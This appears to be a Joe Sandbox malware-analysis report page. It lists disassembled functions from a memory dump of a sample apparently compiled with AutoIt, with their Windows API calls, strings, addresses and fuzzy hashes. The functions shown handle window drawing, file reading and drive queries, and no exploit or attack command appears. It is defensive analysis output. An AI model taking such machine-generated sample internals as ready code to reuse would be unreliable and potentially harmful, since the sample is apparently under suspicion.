                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 12e9e6a9eb4164f20a609992a8480221826bcf33df6285787212f65eb7ee24cc
                                                                  • Instruction ID: 328a2786b9058849f49f4c13d6924020576ff52e4165bac151f33b5a08537c35
                                                                  • Opcode Fuzzy Hash: 12e9e6a9eb4164f20a609992a8480221826bcf33df6285787212f65eb7ee24cc
                                                                  • Instruction Fuzzy Hash: 3612BE75904205CFDB2ADF54C480FAAB7B0FF18305F158069ED5AAB361E731AE89CB91
                                                                  Function 0035AF50 Relevance: .5, Instructions: 514COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throwstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3728558374-0
                                                                  • Opcode ID: 2cbb36536e3b3f3527a5a099dc1182a7ad8bee7bc695cf7f2f9070eea2324fda
                                                                  • Instruction ID: feca25bc4ab47fa0de5463c976b37b62bce27b23a4d9fd9619f52f316d1ec3dd
                                                                  • Opcode Fuzzy Hash: 2cbb36536e3b3f3527a5a099dc1182a7ad8bee7bc695cf7f2f9070eea2324fda
                                                                  • Instruction Fuzzy Hash: E7029070A00205DFDF16DF68D991AAFB7B5EF44300F118469E806EB2A5EB31DE15CB91
                                                                  Function 003702A4 Relevance: .3, Instructions: 345COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                  • Instruction ID: f2276c5df9f62bc108d9688ad2f4e54d2e9848ced076ee3152a4594823208992
                                                                  • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                  • Instruction Fuzzy Hash: 24C1C1322091934EDB2F463A843443EBEA15BA27B131B876DD8B6CB5D5EF24C534D620
                                                                  Function 003706D9 Relevance: .3, Instructions: 341COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                  • Instruction ID: 2549a941642334b3741fd4d0e96ea50a7b47ac0053551ecf8c22f5177ca7b93c
                                                                  • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                  • Instruction Fuzzy Hash: F0C1CF322051938EDF6E463AC43443EBEA15BA2BB131B876DD4B6CB4D9EF24D534D620
                                                                  Function 0036FE6F Relevance: .3, Instructions: 331COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction ID: 18f6a339202cfd07d118dd14bf013cb87a20f437867d5bd73a1200c257862eef
                                                                  • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                  • Instruction Fuzzy Hash: C9C1AF322051934EDF2F863A943443EBEA15BA27B131B876DD4B6CB4DAEF24C534D620
                                                                  Function 0036FA57 Relevance: .3, Instructions: 323COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction ID: 808a6d987a2607a48ad7f2d63f896e365fa0ad5208cd4c9767d5fb78fd90b834
                                                                  • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                  • Instruction Fuzzy Hash: 5AC15F322090930DDF2E4639E47443EBEA15BA2BB531B877DD4B2CB5D9EE20D574D620
                                                                  Function 003AA2A9 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 003AA2FE
                                                                  • DeleteObject.GDI32(00000000), ref: 003AA310
                                                                  • DestroyWindow.USER32 ref: 003AA31E
                                                                  • GetDesktopWindow.USER32 ref: 003AA338
                                                                  • GetWindowRect.USER32(00000000), ref: 003AA33F
                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003AA480
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003AA490
                                                                  • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA4D8
                                                                  • GetClientRect.USER32(00000000,?), ref: 003AA4E4
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003AA51E
                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA540
                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA553
                                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA55E
                                                                  • GlobalLock.KERNEL32(00000000), ref: 003AA567
                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA576
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 003AA57F
                                                                  • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA586
                                                                  • GlobalFree.KERNEL32(00000000), ref: 003AA591
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA5A3
                                                                  • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003DD9BC,00000000), ref: 003AA5B9
                                                                  • GlobalFree.KERNEL32(00000000), ref: 003AA5C9
                                                                  • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 003AA5EF
                                                                  • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 003AA60E
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA630
                                                                  • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003AA81D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                  • String ID: $AutoIt v3$DISPLAY$static
                                                                  • API String ID: 2211948467-2373415609
                                                                  • Opcode ID: 35008d1a6f1a4af266593dbeeab2550b07dcc586342a72a0b2c3664a4e80cfe9
                                                                  • Instruction ID: 8bcac503b1a82401d0712915c99979b5b3b9b1d23452cf67464e50c821a2887e
                                                                  • Opcode Fuzzy Hash: 35008d1a6f1a4af266593dbeeab2550b07dcc586342a72a0b2c3664a4e80cfe9
                                                                  • Instruction Fuzzy Hash: DC027C76A00214EFDB16DFA4DD89EAE7BB9FB49310F008159F915AB2A0C774ED41CB60
                                                                  Function 003BD285 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetTextColor.GDI32(?,00000000), ref: 003BD2DB
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 003BD30C
                                                                  • GetSysColor.USER32(0000000F), ref: 003BD318
                                                                  • SetBkColor.GDI32(?,000000FF), ref: 003BD332
                                                                  • SelectObject.GDI32(?,00000000), ref: 003BD341
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 003BD36C
                                                                  • GetSysColor.USER32(00000010), ref: 003BD374
                                                                  • CreateSolidBrush.GDI32(00000000), ref: 003BD37B
                                                                  • FrameRect.USER32(?,?,00000000), ref: 003BD38A
                                                                  • DeleteObject.GDI32(00000000), ref: 003BD391
                                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 003BD3DC
                                                                  • FillRect.USER32(?,?,00000000), ref: 003BD40E
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 003BD439
                                                                    • Part of subcall function 003BD575: GetSysColor.USER32(00000012), ref: 003BD5AE
                                                                    • Part of subcall function 003BD575: SetTextColor.GDI32(?,?), ref: 003BD5B2
                                                                    • Part of subcall function 003BD575: GetSysColorBrush.USER32(0000000F), ref: 003BD5C8
                                                                    • Part of subcall function 003BD575: GetSysColor.USER32(0000000F), ref: 003BD5D3
                                                                    • Part of subcall function 003BD575: GetSysColor.USER32(00000011), ref: 003BD5F0
                                                                    • Part of subcall function 003BD575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003BD5FE
                                                                    • Part of subcall function 003BD575: SelectObject.GDI32(?,00000000), ref: 003BD60F
                                                                    • Part of subcall function 003BD575: SetBkColor.GDI32(?,00000000), ref: 003BD618
                                                                    • Part of subcall function 003BD575: SelectObject.GDI32(?,?), ref: 003BD625
                                                                    • Part of subcall function 003BD575: InflateRect.USER32(?,000000FF,000000FF), ref: 003BD644
                                                                    • Part of subcall function 003BD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003BD65B
                                                                    • Part of subcall function 003BD575: GetWindowLongW.USER32(00000000,000000F0), ref: 003BD670
                                                                    • Part of subcall function 003BD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003BD698
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 3521893082-0
                                                                  • Opcode ID: e9da20d35a190cee10821ab059d6688a38655d24dc9dce4606f7808dea872ade
                                                                  • Instruction ID: 27328b2e0149122b1c12c379a2ffdd5f53202d4c3b7e9e86cc133d6a26417afe
                                                                  • Opcode Fuzzy Hash: e9da20d35a190cee10821ab059d6688a38655d24dc9dce4606f7808dea872ade
                                                                  • Instruction Fuzzy Hash: C691A071409301BFC7129F64EC08EAB7BADFF89325F100A1AFA66965E0D731D944CB52
                                                                  Function 0036B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32 ref: 0036B98B
                                                                  • DeleteObject.GDI32(00000000), ref: 0036B9CD
                                                                  • DeleteObject.GDI32(00000000), ref: 0036B9D8
                                                                  • DestroyIcon.USER32(00000000), ref: 0036B9E3
                                                                  • DestroyWindow.USER32(00000000), ref: 0036B9EE
                                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 003CD2AA
                                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003CD2E3
                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 003CD711
                                                                    • Part of subcall function 0036B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0036B759,?,00000000,?,?,?,?,0036B72B,00000000,?), ref: 0036BA58
                                                                  • SendMessageW.USER32 ref: 003CD758
                                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003CD76F
                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 003CD785
                                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 003CD790
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                  • String ID: 0
                                                                  • API String ID: 464785882-4108050209
                                                                  • Opcode ID: adc0859be28a0a4034e76e7dc2e56f28b2fa40f4d194e3778be04dde51dea64c
                                                                  • Instruction ID: aa49e7325a42acb9fbe925f43b2af2caa45b2872869ac0c40ce0aa1e8badb06b
                                                                  • Opcode Fuzzy Hash: adc0859be28a0a4034e76e7dc2e56f28b2fa40f4d194e3778be04dde51dea64c
                                                                  • Instruction Fuzzy Hash: 0C126A342042419FDB16DF24D884FA9BBE9BB45304F59457EFA89CB662CB31EC81CB91
                                                                  Function 0039DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0039DBD6
                                                                  • GetDriveTypeW.KERNEL32(?,003EDC54,?,\\.\,003EDC00), ref: 0039DCC3
                                                                  • SetErrorMode.KERNEL32(00000000,003EDC54,?,\\.\,003EDC00), ref: 0039DE29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                  • API String ID: 2907320926-4222207086
                                                                  • Opcode ID: bb3c8f5bf0b19bc201b1849bdfbeac601b1569360e5d7579c9ef1d52d9d75f52
                                                                  • Instruction ID: 00f2923ec0514adb3ce8e5d4c82eeb42084edad1c41b7c6d3939e2dff31b6d00
                                                                  • Opcode Fuzzy Hash: bb3c8f5bf0b19bc201b1849bdfbeac601b1569360e5d7579c9ef1d52d9d75f52
                                                                  • Instruction Fuzzy Hash: 7A51A630258301DBCA12DF14C853D29BBB8FF5474AB20592AF407BF6E2DB74E945DA45
                                                                  Function 0035CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                  • API String ID: 1038674560-86951937
                                                                  • Opcode ID: 762d4218b41dd2590f7a23e518a2f346a81b4d50b7a6c11ae804181d2fb35fe6
                                                                  • Instruction ID: 3485bb3740b6df55cb19a6b9ebae6d9d3d8364c45594dc14a509b706c0002310
                                                                  • Opcode Fuzzy Hash: 762d4218b41dd2590f7a23e518a2f346a81b4d50b7a6c11ae804181d2fb35fe6
                                                                  • Instruction Fuzzy Hash: 7C81E8316403197ECB27AA64DC82FAF7778AF14706F045029FD05AE1D6EA609A55C391
                                                                  Function 003BC6E9 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 447windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 003BC788
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003BC83E
                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 003BC859
                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 003BCB15
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: 0
                                                                  • API String ID: 2326795674-4108050209
                                                                  • Opcode ID: 3452be679025cf3c605508251f418b39438287d42ca4ab0ce0bfc4f43e016b25
                                                                  • Instruction ID: 85c693c8e722f6f8d474b5080a34162d5ae8f06f8d41844acaed1f512f525ece
                                                                  • Opcode Fuzzy Hash: 3452be679025cf3c605508251f418b39438287d42ca4ab0ce0bfc4f43e016b25
                                                                  • Instruction Fuzzy Hash: F4F1D071215305AFE732CF24C885BEABBE8FF49318F085529F699D6AA1C774C841CB91
                                                                  Function 003B638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?,003EDC00), ref: 003B6449
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                  • API String ID: 3964851224-45149045
                                                                  • Opcode ID: eb14a03874fbe229bf52e7d2899a7018a7bb86575ed3d47cc4ba7dec5c715772
                                                                  • Instruction ID: e52cf7ba34774f0c6df93ef93e1885bdadd5d0a40d56f9e431de76974cd02bfd
                                                                  • Opcode Fuzzy Hash: eb14a03874fbe229bf52e7d2899a7018a7bb86575ed3d47cc4ba7dec5c715772
                                                                  • Instruction Fuzzy Hash: 42C1B5342043458FCB06FF10C552AAE7795AF95348F108869F9865FAE3DB38ED0ACB45
                                                                  Function 003BD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(00000012), ref: 003BD5AE
                                                                  • SetTextColor.GDI32(?,?), ref: 003BD5B2
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 003BD5C8
                                                                  • GetSysColor.USER32(0000000F), ref: 003BD5D3
                                                                  • CreateSolidBrush.GDI32(?), ref: 003BD5D8
                                                                  • GetSysColor.USER32(00000011), ref: 003BD5F0
                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003BD5FE
                                                                  • SelectObject.GDI32(?,00000000), ref: 003BD60F
                                                                  • SetBkColor.GDI32(?,00000000), ref: 003BD618
                                                                  • SelectObject.GDI32(?,?), ref: 003BD625
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 003BD644
                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003BD65B
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 003BD670
                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003BD698
                                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003BD6BF
                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 003BD6DD
                                                                  • DrawFocusRect.USER32(?,?), ref: 003BD6E8
                                                                  • GetSysColor.USER32(00000011), ref: 003BD6F6
                                                                  • SetTextColor.GDI32(?,00000000), ref: 003BD6FE
                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003BD712
                                                                  • SelectObject.GDI32(?,003BD2A5), ref: 003BD729
                                                                  • DeleteObject.GDI32(?), ref: 003BD734
                                                                  • SelectObject.GDI32(?,?), ref: 003BD73A
                                                                  • DeleteObject.GDI32(?), ref: 003BD73F
                                                                  • SetTextColor.GDI32(?,?), ref: 003BD745
                                                                  • SetBkColor.GDI32(?,?), ref: 003BD74F
                                                                  Memory Dump Source
